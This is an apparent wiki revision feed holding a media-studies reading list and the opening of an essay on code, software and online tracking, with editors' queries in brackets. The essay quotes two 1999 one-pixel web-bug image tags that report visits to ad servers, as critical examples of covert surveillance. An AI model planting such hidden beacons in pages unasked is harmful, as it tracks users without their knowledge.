&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes] &lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media] &lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda&lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4703</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4703"/>
		<updated>2012-04-18T14:03:35Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
